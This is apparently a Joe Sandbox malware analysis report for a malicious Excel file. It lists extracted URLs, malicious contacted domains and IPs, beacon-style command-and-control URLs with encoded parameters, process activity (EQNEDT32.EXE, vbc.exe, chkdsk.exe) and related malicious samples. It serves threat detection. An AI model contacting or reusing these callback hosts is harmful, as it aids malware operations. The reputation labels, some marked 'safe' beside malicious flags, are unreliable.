          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.tuvandadayvitos24h.online/bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf-0%Avira URL Cloudsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.acdfr.com/bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf-0%Avira URL Cloudsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.acdfr.com
          199.34.228.73
          truetrueunknown
          ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com
          54.254.26.94
          truefalse
            high
            td-balancer-euw2-6-109.wixdns.net
            35.246.6.109
            truetrueunknown
            h2oturkiye.com
            94.73.146.42
            truetrueunknown
            www.yjpps.com
            0.0.0.0
            truefalse
              unknown
              gdsjgf.com
              34.102.136.180
              truetrue
                unknown
                www.h2oturkiye.com
                unknown
                unknowntrue
                  unknown
                  www.tuvandadayvitos24h.online
                  unknown
                  unknowntrue
                    unknown
                    www.gdsjgf.com
                    unknown
                    unknowntrue
                      unknown
                      www.thepoetrictedstudio.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.tuvandadayvitos24h.online/bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf-true
                        • Avira URL Cloud: safe
                        unknown
                        http://www.acdfr.com/bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf-true
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://search.chol.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                          high
                          http://www.mercadolivre.com.br/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://search.ebay.de/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://www.mtv.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.rambler.ru/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.nifty.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.dailymail.co.uk/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www3.fnac.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://buscar.ya.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://search.yahoo.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.sogou.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://asp.usatoday.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://fr.search.yahoo.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://rover.ebay.comexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://in.search.yahoo.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://search.ebay.in/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://msk.afisha.ru/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://search.rediff.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://www.windows.com/pctv.explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.ya.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://it.search.dada.net/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://search.naver.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://www.google.ru/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://search.hanafos.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.abril.com.br/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://search.daum.net/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://search.naver.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.clarin.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://buscar.ozu.es/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://kr.search.yahoo.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://search.about.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://busca.igbusca.com.br/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://www.ask.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.priceminister.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.cjmall.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.centrum.cz/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://suche.t-online.de/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.google.it/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://search.auction.co.kr/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.ceneo.pl/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.amazon.de/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.2191880997.000000000861C000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://sads.myspace.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://google.pchome.com.tw/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.rambler.ru/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://uk.search.yahoo.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://espanol.search.yahoo.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.ozu.es/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://search.sify.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://openimage.interpark.com/interpark.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://search.ebay.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.gmarket.co.kr/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://search.nifty.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://searchresults.news.com.au/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://www.google.si/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.google.cz/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.soso.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.univision.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://search.ebay.it/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://busca.orange.es/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.target.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://buscador.terra.es/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.iask.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.tesco.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://search.interpark.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://investor.msn.com/explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.espn.go.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://service2.bfast.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.%s.comPAexplorer.exe, 00000007.00000000.2176816601.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    low
                                                                                                                                                    http://ariadna.elmundo.es/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.news.com.au/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.cdiscount.com/explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.tiscali.it/favicon.icoexplorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high

                                                                                                                                                          Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          18.195.87.136
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02UStrue
                                                                                                                                                          35.246.6.109
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUStrue
                                                                                                                                                          34.102.136.180
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUStrue
                                                                                                                                                          199.34.228.73
                                                                                                                                                          unknownUnited States
                                                                                                                                                          27647WEEBLYUStrue
                                                                                                                                                          94.73.146.42
                                                                                                                                                          unknownTurkey
                                                                                                                                                          34619CIZGITRtrue
                                                                                                                                                          54.254.26.94
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                          Analysis ID:339199
                                                                                                                                                          Start date:13.01.2021
                                                                                                                                                          Start time:17:16:08
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 11m 23s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:light
                                                                                                                                                          Sample file name:NEW 01 13 2021.xlsx
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.expl.evad.winXLSX@11/6@6/6
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:
                                                                                                                                                          • Successful, ratio: 17% (good quality ratio 15.9%)
                                                                                                                                                          • Quality average: 67.9%
                                                                                                                                                          • Quality standard deviation: 29.7%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found application associated with file extension: .xlsx
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer
                                                                                                                                                          Warnings:
                                                                                                                                                          Show All
                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                          • TCP Packets have been reduced to 100

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          17:17:09API Interceptor51x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                          17:17:11API Interceptor153x Sleep call for process: vbc.exe modified
                                                                                                                                                          17:17:43API Interceptor225x Sleep call for process: chkdsk.exe modified
                                                                                                                                                          17:18:19API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          35.246.6.10913012021.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.bundletvdeal.com/rbg/?-ZV4gjY=to4tkdRL4YHA7dFuLU2eXo05W8isULo1FyIdtylq+bSQeog839DOSFLS2i7IODeWwLrq&-ZSl=1bgPBf
                                                                                                                                                          5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.tokachiashi50.xyz/de92/?AjR=9r4L1&FdC4E2D=DPoRsgVn0ximhxQQlPjeokREX/UlirV5eRM8dxhcnaqNY4JbxsfONmN6rFGqDxwHgkPo+9oGSw==
                                                                                                                                                          Revise Order.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.brian.productions/ehxh/?Lh0l=ZTdpL2D0k&nVjxUJ=CZx2i55e3gGiW4/DSVy15Qy0G8363Kbzg9nIH4VtHAka16TJPcE8hbtAvrpVwAXJXJrP
                                                                                                                                                          quote.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.celerationeducation.com/knb/?EjUHDz=fdM8vL4XuV&9rN4eR=EZcXz466rumSDBpdu/Qq8XPG+U1yHO6YRL94ofeMuKEdfpTZINiN5O0jpAXngdJo5VDm3mGghw==
                                                                                                                                                          DTwcHU5qyI.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.tokachiashi50.xyz/de92/?lJELz4=DPoRsgVn0ximhxQQlPjeokREX/UlirV5eRM8dxhcnaqNY4JbxsfONmN6rFGTcAQEuyTv+9oBBA==&uVg8=3fLpHXkX8
                                                                                                                                                          SEA LION LOGISTICS-URGENT QUOTATION.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.albertosilva.online/oge8/?pPU=EFQxUL1HhHpL&abvDxBr=10cnRnzbg3vVADwDI3oHDHdqCa26NyIrPT2AJhUQLFJntxNMNpxEVPDpZS2GpPRm/3SU
                                                                                                                                                          current productlist.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.brian.productions/ehxh/?kRcDUld=CZx2i55e3gGiW4/DSVy15Qy0G8363Kbzg9nIH4VtHAka16TJPcE8hbtAvoF8zArxeqeZIu/xaQ==&lZ9D=p2JpVPJHKZml3dvp
                                                                                                                                                          List.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.jacksonarearealestate.com/2kf/?UR-X423=q6+emO9k8TlYm3w4k0XfieU6EAeXVQK5qEFrNBHw70+yoBenCaqB4YVZV0U51sOgUQyoLxKh/w==&mL08l=WZA0u2VhjbRpJ
